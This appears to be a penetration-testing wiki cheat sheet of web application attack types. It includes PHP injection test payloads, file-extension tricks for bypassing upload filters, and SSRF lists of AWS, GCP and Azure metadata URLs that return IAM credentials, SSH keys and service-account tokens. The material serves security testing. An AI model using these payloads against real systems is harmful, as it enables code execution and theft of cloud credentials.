Types of Web Application Attacks

Penetration Testing Wiki

Server-Side Attacks

Client-Side Attacks

  • XSS (Cross-Site Scripting)
  • CSRF (Cross-Site Request Forgery)

HTTP headers security

  • HSTS (HTTP Strict Transport Security) Protects against Man-in-the-Middle, downgrade attacks and cookie hijacking in the webbrowser
  • CORS (Cross-origin resource sharing) Protects cross-domain XHR calls to prevent XSS in the webbrower
  • CSP (Content Security Policy) https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Content-Security-Policy Controls which origins and scripts the user agents loads to prevent XSS in the webbrowser

Authentication protocols

SAML Atacks

SAML: Security Assertion Markup Language is an open standard for exchanging authentication and authorization data between parties, in particular, between an identity provider and a service provider. As its name implies, SAML is an XML-based markup language for security assertions (statements that service providers use to make access-control decisions). The single most important use case that SAML addresses is web browser single sign-on (SSO).

Attacks on SAML protocol

PHP Attacks

Payloads to test injections:

{phpinfo()}.txt
{${phpinfo()}}.txt
{sleep(5)}.txt
NULL byte in octal: \400
NULL byte in hex: \x00

Tricky php file uploads extensions for bypassing restrictions:

.php3
.php4
.php5
.pht

JavaScript Attacks

Meteor Framework

Meteor.connection._methodHandlers

Reference:
https://www.offensive-security.com/offsec/wekan-authentication-bypass/

SSRF Attacks

Internal URLs by provider: https://gist.github.com/jhaddix/78cece26c91c6263653f31ba453e273b

AWS

  • http://169.254.169.254/latest/user-data
  • http://169.254.169.254/latest/user-data/iam/security-credentials/[ROLE NAME]
  • http://169.254.169.254/latest/meta-data/iam/security-credentials/[ROLE NAME]
  • http://169.254.169.254/latest/meta-data/ami-id
  • http://169.254.169.254/latest/meta-data/reservation-id
  • http://169.254.169.254/latest/meta-data/hostname
  • http://169.254.169.254/latest/meta-data/public-keys/0/openssh-key
  • http://169.254.169.254/latest/meta-data/public-keys/[ID]/openssh-key
  • http://169.254.169.254/latest/meta-data/
  • http://169.254.169.254/latest/meta-data/public-keys/

GCP

NOTE: Requires the header “Metadata-Flavor: Google” or “X-Google-Metadata-Request: True”

  • http://169.254.169.254/computeMetadata/v1/
  • http://metadata.google.internal/computeMetadata/v1/
  • http://metadata/computeMetadata/v1/
  • http://metadata.google.internal/computeMetadata/v1/instance/hostname
  • http://metadata.google.internal/computeMetadata/v1/instance/id
  • http://metadata.google.internal/computeMetadata/v1/instance/region
  • http://metadata.google.internal/computeMetadata/v1/instance/zone
  • http://metadata.google.internal/computeMetadata/v1/project/project-id
  • http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token
  • http://metadata.google.internal/computeMetadata/v1beta1/instance/service-accounts/default/
  • http://metadata.google.internal/computeMetadata/v1beta1/

Azure

  • http://169.254.169.254/metadata/v1/maintenance

Blind SSRF reference: https://github.com/assetnote/blind-ssrf-chains

More payloads: https://github.com/defensahacker/spinfuzz (Fuzzing lists for webapp pentesting)